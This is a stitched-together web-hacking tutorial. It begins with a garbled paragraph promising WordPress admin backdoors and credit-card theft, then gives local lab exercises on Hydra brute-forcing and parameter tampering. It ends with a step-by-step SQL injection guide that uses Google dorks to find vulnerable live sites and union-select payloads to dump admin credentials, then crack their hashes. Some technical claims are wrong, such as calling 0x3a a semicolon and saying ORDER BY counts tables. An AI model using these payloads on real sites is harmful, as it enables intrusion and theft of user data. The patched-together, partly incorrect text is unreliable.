Introduction
Today we will learn about WordPress Hacking Tutorials to Add Administrator User Secretly. Do not think too complex about this tutorial, because we will learn this with approach to social engineering technique. And this is the definition about Social Engineering: Social engineering, in the context of. How to Hack Shop Admin and Steal Credit Cards New Tutorial 2015. First method of sql injection and shopadmin hacking don't provide with pins, it only give cc numb.
Websites are used daily by a large part of the world’s population to carry sensitive data from a person to an entity with online-based presence. In websites containing materials that are shown after authentication only, forms transfer data containing user credentials to server-side scripts. Users store their credit card details in their online accounts and use forms to buy items online, so it is crucial to keep the integrity, confidentiality and availability of this data intact.
This article is written merely with penetration testing and website security in mind. Any attempts to penetrate into live systems on your behalf and without consent may lead to criminal proceedings.
To try the training files that come along with this article, you would need a local server such as XAMPP or WAMPP with Apache and preferably MySQL turned on. If you are on Windows, to install Hydra you would need to install make, gcc and ssl libraries of Cygwin. Therafter, you would need to start it with the Cygwin Terminal. John the Ripper, on the other hand, can be started from the Command Prompt.
Fill out the form below to download the code associated with this article.
Exercise 1: Deep Data Hiding
In the past, and even today, some people have used security through obscurity. This means that they have unprotected directories and files with the sole protection being that they do not have any backlinks and no links to them in the main site. Thus, if one knew the URL of the directory or file – he could readily access it. A common way to reveal obscure directories is to check the publicly visible robots.txt and see what is disallowed to be indexed by search engines.
Now open the DeepDataHiding folder through your localhost and try to find the hidden directory where uploaded .doc files from “users” are stored, then access it. If you upload a .doc file to test this out, in the main page of the directory – it won’t leave your computer.
Exercise 2: Populating a Dictionary
To populate a dictionary, we will be using John the Ripper. Open the PopulatingDictionary folder.
You can populate a dictionary in John the Ripper and cut the output size by knowing the type of password (its maximum length, whether it should be only digits, contain special characters, etc.).
To create a simple dictionary and save it to a file, you can browse to the directory of the john the ripper installation in CMD and use: john-mmx –incremental=alpha –stdout > filename whereas filename is the name and location of the file in which the words should be saved to.
There are various options in the incremental mode, such as Digit (only digits), Lanman (letters, numbers and some special characters), Alpha (only letters) and All (all characters). Thus, you can also use john-mmx –incremental=lanman –stdout > wordlist.txt, etc.
Be aware that the size of the text file would probably get really big in just a couple of seconds, depending on your machine’s abilities.
Exercise 3: Acquiring user and password list for dictionary attacks
Querying Google for passwords and user lists is usually pretty straightforward.
You use something like filetype:lst password for passwords and filetype:lst user for username lists.
We have included a sample username list and a password list downloaded from the Internet along with the attachment files to this article.
Exercise 4: Breaking HTTPAuth
For this exercise, we will be using Hydra and the user/pass lists included in the attachment files.
When calling Hydra ($ hydra.exe) the parameter –L usrlistpath serves the purpose of supplying the program a path to a username list file whose usernames will be tested along with all the passwords until a match is found. –l username gives Hydra a single username, which option can be used if you know the username you are trying to break into but do not know the particular password.
-P loads a password list while –p loads a single password.
Next, you specify the host to attack (localhost or 127.0.0.1) followed by http-get (request a directory/page), followed by the path to the particular directory or file you are trying to access (path excluding the host which is already given). It will most likely look something like this:
hydra.exe -L HD:/WebsiteHacking/FormCracking/usrnames.txt -P HD:/WebsiteHacking/FormCracking/passwords.txt localhost http-get /HTTPSecurity/
Figure 1: the HTTPAuth seeking credentials. Get them!
To establish a simple HTTPAuth mechanism yourself, you need to create your password by browsing to htpasswd.exe in your Apache bin folder, starting it in Command Prompt, and creating it. You can move the user account list file to any directory you want and start the mechanism by editing your .htaccess file:
You can select only particular users to be able to access the page, and you can set different username lists for different parts of the website, but this mechanism for protection remains basic. To test cracking the example from the files, change the path of AuthUserFile to the current location of the HTTPSecurity directory.
Exercise 5: Breaking a POST login form
The password and usernames list are in the FormCracking folder. They have not been changed, but the correct login credentials are easy enough.
The following statement might work:
hydra –L path/FormCracking/usrnames.txt -P path/FormCracking/passwords.txt 127.0.0.1 http-post-form
“/FormCracking/index.php:username=^USER^&passwd=^PASS^:Oops”
The difference between this statement and when we cracked the HTTPAuth mechanism is that here we include the parameters that the form sends to the server-side script, in this case username and password. Those are the “name” attributes of the relevant input tags that we want to test.
Figure 2: viewing the POST fields.
Another difference is that after the address that we want to crack we include separated by a colon ( : ) the text that shows when the login submission is incorrect. Basically, we are telling the program to repeat until it gets a different output. In our case, we have “Oops” as a part of the login error string we receive.
We also include ^USER^ and ^PASS^ after each POST field that must be filled with the data from the username and password lists by the program.
Then, we wait and the job is done.
Exercise 6: Modifying Parameters
The next exercise is in the folder ParameterTampering. Open ParameterTampering/login.php with your browser. Your task is to bypass authorization or login with wrong credentials without viewing the server-side code and accessing members.php message and members2.php without the “Error!”. You do not have to crack the user details. For one of the methods, you must see what logging in looks like – use john/123
The first manner in which you can do this is by modifying an element in the page, the second involves a change in the URL.
The other task is to enter in members2.php without the server echoing “Error”. To do this, you should tamper with the HTTP Headers and add a referrer. I would recommend a plugin such as Tamper Data for Firefox or Request Maker for Chrome.
Answers:
1st possibility:
Figure 3: modifying the values of hidden inputs.
It might seem weird at first, but many sites actually have hidden inputs in which they store important data. An example is PayPal shopping carts on third-party websites where you can change fields such as name of the product directly by changing the value of a hidden input. There are some outdated shopping carts which still use price as a hidden input which means that if you don’t use their API and verify the amount that was paid to you through a server-side script – the user can easily pay as much as he wants for the product!
Figure 4: an example of a shopping cart which sets the price of the item on the client-side.
Figure 5: changing the name of the product in stores using PayPal as a payment method can still do some harm.
2nd possibility:
Setting a loggedin GET request, that’s probably not something you would meet somewhere today though.
3rd possibility, members2.php:
Install and start Tamper Data with alt+T when the page is opened. Add a new Header…
Called Referer and with value the path to login.php, it would look like you were redirected from login.php. There are developers out there who think HTTP_REFERER proves that the user is legitimate despite that it’s just a header sent through HTTP requests, and this is a point of exploitation in some sites even today.
Exercise 7: Exploiting Account Lockout
If you have a simple lockout mechanism like this (PHP/MySQL (AccountLockout1 folder)):
If we have such a login form and we are relying on a plugin from WordPress or Joomla and we are not aware of that – then malicious people can block an account just by knowing the username. In many sites, the username is readily available such as in comments to articles, message boards, social media likes, etc.
A solution is both to block only the offending IP address and to provide the block only for a limited duration.
A sample solution of adding a duration for the account lockout In PHP/MySQL could look something like this:
Adding a user to the database could look like:
We use the number -1 to indicate that there is no lockout.
Then we change a bit the old code:
Then we change a bit the old code:
This simple script will lockout the account after 3 attempts for different periods of time – until a full hour has passed since the lockout. It can be found in the AccLockoutDuration folder.
It is yet even better to create an IP ban and implement a better version of the above script as it serves demonstrative purposes only.
Exercise 8: yet to come…
Conclusion
We have barely covered the topic of website hacking and web security, as this is a vast field to touch upon. Yet, I hope future articles would reveal more and more of this field, as the leakage of data could not only harm the reputation of your business, the trust of your clients, the well-being of clients, but also can put you in front of serious legal proceedings.
SQL Injection
If you are new to the world of hacking websites, then SQL injection is possibly the easiest to learn and most common of the substantial website vulnerabilites that can be exploited.
NOTE: The following tutorial contains only basic SQL injection, if you are already familiar with this, then this tutorial will probably not help you.
Hacking a vulnerable website with SQL injection (more commonly known as SQLi) allows you to obtain usernames and passwords, possibly even access the admin account, and from there you could do whatever you wanted to the website. When Anonymous//LulzSec hacked the Sony Playstaion Network and obtained personal information of hundreds of thousand of users, they used an advanced form of this hack. This hack can be performed from any computer or device with an internet connection and a browser.
Step 1: Find a vulnerable website. One way you can do this is by using what is called a Google
This is a list of dorks you can use to help you find an SQL vulnerable website, using Google Search! Simply go to Google and enter (without quotes) allinurl:dorkhere
trainers.php?id=
article.php?id=
play_old.php?id=
staff.php?id=
games.php?id=
newsDetail.php?id=
product.php?id=
product-item.php?id=
news_view.php?id=
humor.php?id=
humour.php?id=
opinions.php?id=
spr.php?id=
pages.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id-
website.php?id=
hosting_info.php?id=
detail.php?id=
publications.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
shop.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
ages.php?id=
review.php?id=
announce.php?id=
participant.php?id=
download.php?id=
main.php?id=
profile_view.php?id=
view_faq.php?id=
fellows.php?id=
club.php?id=
clubpage.php?id=
viewphoto.php?id=
curriculum.php?id=
top10.php?id=
article.php?id=
person.php?id=
game.php?id=
art.php?id=
read.php?id=
newsone.php?id=
title.php?id=
home.php?id=
NOTE: The above list of dorks is only a very short list, a more comprehensive list can be found on the internet.
Step 2: When you have found a vulnerable URL that you like, such as
www.site.com/news.php?id=2
add a single quote mark to the end of the URL, so that it looks like this:
www.site.com/news.php?id=2'
Step 3: The site will be vulnerable to this attack if you get an error, or some of the content (pictures / text are common) from the page is missing.
Step 4: Now that we have confirmed that the site is vulnerable, we will try what is called an order by syntax.
At the end of your URL, remove your quote mark, and add the following: +order+by+50--
If you get an error, this is good. If you do not get an error, you should try to find a different site, there are ways to get around this, but they will not be covered in this tutorial.
The idea is to find the highest possible number you can order by without getting an error or missing content. This is the number of tables that the site contains.
For example, if you get an error at 9, but not at 8, it means that the number you will be using is 8. Write this number down. Remember, it is the number without an error, not with.
An example URL is below:
www.site.com/news.php?id=2 order by 8--
Step 5: Now that we have the number of tables, we will perform what is called a union select syntax.
Remove your order by syntax, making sure to have written down / remembered the number of tables (the highest number without an error or missing content).
Add a negative symbol (a dash) before the ID number.
Now add the following to your URL: union select 1, 2, 3, 4, 5, 6, 7, 8--
This syntax will select the number of tables that you wish to use.
You should count up until the number of tables that the page has.
An example URL is below:
www.site.com/news.php?id=-2 union select 1, 2, 3, 4, 5, 6, 7, 8--
If you see a couple of numbers on the page, you have done it correctly! Good work! If you see an error resembling 'The union select statement does not match the number of tables on the page', then the site resisted the order by syntax. In this case, you should try to find another site, there are again ways to get around this, but this is a basic tutorial.
Step 6: When you see the numbers on the page (they should be numbers between 1 and the number of tables on the site) (there should be 2-6 numbers), choose one of them.
Now, replace the number you chose in your union select syntax with @@version. Let's say I choose 2.
An example URL is below:
www.site.com/news.php?id=-2 union select 1, @@version, 3, 4, 5, 6, 7, 8--
Now the number you chose should be replaced by a string of numbers. This is usually a 4.xx.xxx or a 5.xx.xxx. This is the MySQL version the target is running. This is important for later.
Step 7: Now we will find the names of the different tables in the site. This is called a group concat syntax.
Replace your @@version with group_concat(table_name) and add from information_schema.tables where table_schema=database()--
An example URL is below:
www.site.com/news.php?id=-2 union select 1, group_concat(table_name), 3, 4, 5, 6, 7, 8 from information_schema.tables where table_schema=database()--
Now in place of the MySQL version you should see a string of words, they could contain anything. These are the websites tables. You want to look for one that sounds like the admin or user tables.
Common tables are:
admin, user, users, members, admintbl, usertbl
Let's say I found the table 'admin' (without quotes)
Now, take the exact name of the table, no additional spaces or linebreaks, and go to http://home2.paulsch...et/tools/xlate/.
Enter your table name into the TEXT field, and click encode.
Now from the ASCII DEC / CHAR field, take those numbers, and replace the spaces with comma's, so that it looks like this (for admin! The numbers will be different depending on the table!)
97,100,109,105,110
Step 8: Now we will find the different columns (such as the username, password, email, accesslevel) of the table we selected.
Change your current group concat syntax to the following.
Replace group_concat(table_name) with group_concat(column_name), and replace from information_schema.tables where table_schema=database()-- with from information_schema.columns where table_name=CHAR(YOUR ASCII HERE)--
An example URL is below:
www.site.com/news.php?id=-2 union select 1, group_concat(column_name), 3, 4, 5, 6, 7, 8 from information_schema.columns where table_name=CHAR(97,100,109,105,110)--
Note that the ASCII numbers you input will be different depending on your table name.
Now the table names will be replaced with the columns.
Common columns include:
userid, user, username, password, email, accesslevel, firstname, lastname
Step 9: What you're looking for is the ones that will give you the information to compromise the site. From the above common columns, the most useful would be username/userid/user (or whatever the user column is called) and password (for obvious reasons). But also we want the accesslevel column, so that we don't have to log in multiple times to find the admin.
Usually the admins accesslevel will be the highest number, higher than the others. Alternatively, the admin user's username may be 'admin' or 'superuser' etc.
Now, we need to again change our group_concat syntax.
Let's say I want the columns userid, password, accesslevel.
Replace your group_concat(column_name) with group_concat(userid,0x3a,password,0x3a,accesslevel). You can replace add more columns if you want, just make sure there is ,0x3a, between each one.
Replace your from information_schema.columns where table_name=CHAR(YOUR ASCII)-- with from TABLE NAME--
Where TABLE NAME is the table that these columns are from.
An example URL is below:
www.site.com/news.php?id=-2 1, group_concat(userid,0x3a,password,0x3a,accesslevel), 3, 4, 5, 6, 7, 8 from admin--
Now your list of columns should be replaced with something like the following:
james:shakespeare:0,ryan:mozart:1,admin:bach:2,superadmin:debussy:3
Or something similar. Remember your current group concat syntax. It will display the data like this, for userid,0x3a,password,0x3a,accesslevel:
USERNAME1:PASSWORD1:ACCESSLEVEL1,USERNAME2:PASSWORD2:ACCESSLEVEL2,USERNAME3:PASSWORD3:ACCESSLEVEL3
, where USERNAME, PASSWORD, and ACCESSLEVEL of the same number all correspond to the same user.
The 0x3a in your group concat translates to a semicolon ( ; ). A comma seperates each individual user.
Often, the password will appear to be a random string of numbers and letters, such as 5f4dcc3b5aa765d61d8327deb882cf99. This is called an MD5 hash. It is an encrypted password.
Step 10: Now we will need to decrypt this password to log in. You can either do this online, or with software. Software is far more effective, as you can set it to an unlimited timelimit and use different methods, but if you don't want to use software due to malware paranoia, that is OK, but sometimes you will not find the password.
If you want to use software, go here: http://www.oxid.it/cain.html and download Cain and Abel. I will not go into how to set this up to crack an MD5, but a simple google search will suffice. 'Cracking MD5 with Cain and Abel' or something similar.
If you want to use a website, go here (I find this to be the best): http://www.md5decrypter.co.uk
Step 11: Login to your newly obtained account (whether its admin or not) and have some fun!
Disclaimer: This tutorial is meant for educational purposes only. Misuse of the techniques above may be in conflict with the laws in your state, province or country. I may not be held responsible for any harm that may come from this tutorial.
Writer : Deepak Kumar (COO & President at Alex Automation)